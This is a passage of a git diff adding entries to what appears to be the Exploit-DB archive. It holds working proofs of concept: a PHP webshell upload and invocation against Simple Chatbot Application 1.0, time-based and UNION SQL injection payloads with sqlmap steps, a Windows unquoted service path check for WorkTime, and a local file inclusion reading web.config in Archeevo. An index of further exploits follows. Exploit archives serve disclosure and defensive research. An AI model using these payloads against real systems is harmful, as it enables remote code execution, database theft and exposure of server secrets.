https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html +# Version: 1.0 +# Tested on: XAMPP, Windows 10 + + +# Exploit : + +You can upload a php shell file as a bot_avatar or user_avatar or image + +# ------------------------------------------------------------------------------------------ +# POC +# ------------------------------------------------------------------------------------------ + +# Request sent as base user + +POST /classes/SystemSettings.php?f=update_settings HTTP/1.1 +Host: localhost.SA +Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------55217074722533208072616276474 +Content-Length: 1121 +Connection: close + +-----------------------------55217074722533208072616276474 +Content-Disposition: form-data; name="name" + + +-----------------------------55217074722533208072616276474 +Content-Disposition: form-data; name="short_name" + + +-----------------------------55217074722533208072616276474 +Content-Disposition: form-data; name="intro" + + +-----------------------------55217074722533208072616276474 +Content-Disposition: form-data; name="no_result" + + +-----------------------------55217074722533208072616276474 +Content-Disposition: form-data; name="img"; filename="" +Content-Type: image/jpeg + + +-----------------------------55217074722533208072616276474 +Content-Disposition: form-data; name="bot_avatar"; filename="bot_avatar.php" +Content-Type: application/octet-stream + + + + + +-----------------------------55217074722533208072616276474 +Content-Disposition: form-data; name="user_avatar"; filename="" +Content-Type: application/octet-stream + + +-----------------------------55217074722533208072616276474-- + + +# Response + +HTTP/1.1 200 OK +Date: Tue, 18 Jan 2022 00:51:29 GMT +Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 +X-Powered-By: PHP/8.0.12 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Length: 119 +Connection: close +Content-Type: text/html; charset=UTF-8 + +1 + +# ------------------------------------------------------------------------------------------ +# Request to webshell +# ------------------------------------------------------------------------------------------ + +GET /uploads/bot_avatar.php?s=echo+0xSaudi HTTP/1.1 +Host: localhost.SA +Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 +Connection: close + +# ------------------------------------------------------------------------------------------ +# Webshell response +# ------------------------------------------------------------------------------------------ + +HTTP/1.1 200 OK +Date: Tue, 18 Jan 2022 00:51:29 GMT +Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12 +X-Powered-By: PHP/8.0.12 +Content-Length: 16 +Connection: close +Content-Type: text/html; charset=UTF-8 + +
0xSaudi
+
\ No newline at end of file diff --git a/exploits/php/webapps/50673.txt b/exploits/php/webapps/50673.txt new file mode 100644 index 000000000..b57507a5a --- /dev/null +++ b/exploits/php/webapps/50673.txt @@ -0,0 +1,37 @@ +# Exploit Title: Simple Chatbot Application 1.0 - 'message' Blind SQLi +# Date: 18/01/2022 +# Exploit Author: Saud Alenazi +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html +# Version: 1.0 +# Tested on: XAMPP, Windows 10 + +# Steps +# Go to : http://127.0.0.1/classes/Master.php?f=get_response +# Save request in BurpSuite +# Run saved request with sqlmap -r sql.txt + +====== + +POST /classes/Master.php?f=get_response HTTP/1.1 +Host: 127.0.0.1 +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Cookie: PHPSESSID=45l30lmah262k7mmg2u5tktbc2 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Encoding: gzip,deflate +Content-Length: 73 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 +Connection: Keep-alive + +message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud + +====== + +#Payloads + +#Payload (UNION query) +message=-8150' UNION ALL SELECT CONCAT(0x717a766b71,0x6d466451694363565172525259434d436c53677974774a424b635856784f4d5a41594e4e75424474,0x716a7a7171),NULL-- - + +#(AND/OR time-based blind) +message=' AND (SELECT 8288 FROM (SELECT(SLEEP(10)))ypPC) AND 'Saud'='Saud \ No newline at end of file diff --git a/exploits/windows/local/50664.txt b/exploits/windows/local/50664.txt new file mode 100644 index 000000000..104f03367 --- /dev/null +++ b/exploits/windows/local/50664.txt @@ -0,0 +1,55 @@ +# Exploit Title: WorkTime 10.20 Build 4967 - Unquoted Service Path +# Discovery by: Yehia Elghaly +# Date: 30-12-2021 +# Vendor Homepage: https://www.worktime.com/ +# Software Link: https://www.worktime.com/download/worktime_corporate.exe +# Tested Version: 10.20 Build Build 4967 +# Vulnerability Type: Unquoted Service Path +# Tested on: Windows 7 x86 - Windows Server 2016 x64 + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" +|findstr /i /v "c:\windows\\" |findstr /i /v """ + +WorkTime Server srvWorkTimeServer +C:\WorkTime\WorkTimeServerService.exe +Auto + +WorkTime Reports Scheduler WorkTimeReportsScheduler +C:\Program Files\WorkTimeAdministrator\WorkTimeReportsScheduler.exe +Auto + +WorkTime Client Watcher Service WTCWatch +C:\Program Files\wtc\WTCWatch.exe WTCWatch +Auto + + +C:\Users\psycho>sc qc WorkTimeReportsScheduler +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: WorkTimeReportsScheduler + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 0 IGNORE + BINARY_PATH_NAME : C:\Program Files\WorkTimeAdministrator\WorkTimeRepo +rtsScheduler.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : WorkTime Reports Scheduler + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\psycho>sc qc WTCWatch +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: WTCWatch + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 0 IGNORE + BINARY_PATH_NAME : C:\Program Files\wtc\WTCWatch.exe WTCWatch + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : WorkTime Client Watcher Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/exploits/windows/remote/50665.txt b/exploits/windows/remote/50665.txt new file mode 100644 index 000000000..05409c6e6 --- /dev/null +++ b/exploits/windows/remote/50665.txt @@ -0,0 +1,27 @@ +# Exploit Title: Archeevo 5.0 - Local File Inclusion +# Google Dork: intitle:"archeevo" +# Date: 01/15/2021 +# Exploit Author: Miguel Santareno +# Vendor Homepage: https://www.keep.pt/ +# Software Link: https://www.keep.pt/produtos/archeevo-software-de-gestao-de-arquivos/ +# Version: < 5.0 +# Tested on: windows + +# 1. Description + +Unauthenticated user can exploit LFI vulnerability in file parameter. + + +# 2. Proof of Concept (PoC) + +Access a page that don’t exist like /test.aspx and then you will be redirected to +https://vulnerable_webiste.com/error?StatusCode=404&file=~/FileNotFoundPage.html + +After that change the file /FileNotFoundPage.html to /web.config and you be able to see the +/web.config file of the application. + +https://vulnerable_webiste.com/error?StatusCode=404&file=~/web.config + + +# 3. Research: +https://miguelsantareno.github.io/MoD_1.pdf \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 3aa4a61c1..df690d1ec 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11432,6 +11432,7 @@ id,file,description,date,author,type,platform,port 50650,exploits/windows/local/50650.py,"VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)",1970-01-01,"Bryan Leong",local,windows, 50653,exploits/windows/local/50653.txt,"Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass",1970-01-01,hyp3rlinx,local,windows, 50654,exploits/windows/local/50654.txt,"Microsoft Windows Defender - Detections Bypass",1970-01-01,hyp3rlinx,local,windows, +50664,exploits/windows/local/50664.txt,"WorkTime 10.20 Build 4967 - Unquoted Service Path",1970-01-01,"Yehia Elghaly",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -18597,6 +18598,7 @@ id,file,description,date,author,type,platform,port 50639,exploits/hardware/remote/50639.txt,"Dixell XWEB 500 - Arbitrary File Write",1970-01-01,"Roberto Palamaro",remote,hardware, 50640,exploits/python/remote/50640.py,"Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Jeremiasz Pluta",remote,python, 50652,exploits/windows/remote/50652.txt,"CoreFTP Server build 725 - Directory Traversal (Authenticated)",1970-01-01,LiamInfosec,remote,windows, +50665,exploits/windows/remote/50665.txt,"Archeevo 5.0 - Local File Inclusion",1970-01-01,"Miguel Santareno",remote,windows, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -44743,3 +44745,13 @@ id,file,description,date,author,type,platform,port 50661,exploits/php/webapps/50661.txt,"Online Diagnostic Lab Management System 1.0 - Stored Cross Site Scripting (XSS)",1970-01-01,Himash,webapps,php, 50662,exploits/php/webapps/50662.txt,"Online Diagnostic Lab Management System 1.0 - SQL Injection (Unauthenticated)",1970-01-01,Himash,webapps,php, 50663,exploits/php/webapps/50663.txt,"WordPress Core 5.8.2 - 'WP_Query' SQL Injection",1970-01-01,"Aryan Chehreghani",webapps,php, +50666,exploits/php/webapps/50666.txt,"Online Resort Management System 1.0 - SQLi (Authenticated)",1970-01-01,"Gaurav Grover",webapps,php, +50667,exploits/php/webapps/50667.txt,"OpenBMCS 2.4 - Cross Site Request Forgery (CSRF)",1970-01-01,LiquidWorm,webapps,php, +50668,exploits/php/webapps/50668.txt,"OpenBMCS 2.4 - SQLi (Authenticated)",1970-01-01,LiquidWorm,webapps,php, +50669,exploits/php/webapps/50669.txt,"OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation",1970-01-01,LiquidWorm,webapps,php, +50670,exploits/php/webapps/50670.txt,"OpenBMCS 2.4 - Server Side Request Forgery (SSRF) (Unauthenticated)",1970-01-01,LiquidWorm,webapps,php, +50671,exploits/php/webapps/50671.txt,"OpenBMCS 2.4 - Information Disclosure",1970-01-01,LiquidWorm,webapps,php, +50672,exploits/php/webapps/50672.txt,"Simple Chatbot Application 1.0 - Remote Code Execution (RCE)",1970-01-01,"Saud Alenazi",webapps,php, +50673,exploits/php/webapps/50673.txt,"Simple Chatbot Application 1.0 - 'message' Blind SQLi",1970-01-01,"Saud Alenazi",webapps,php, +50674,exploits/aspx/webapps/50674.txt,"Nyron 1.0 - SQLi (Unauthenticated)",1970-01-01,"Miguel Santareno",webapps,aspx, +50675,exploits/hardware/webapps/50675.txt,"Creston Web Interface 1.0.0.2159 - Credential Disclosure",1970-01-01,"RedTeam Pentesting GmbH",webapps,hardware,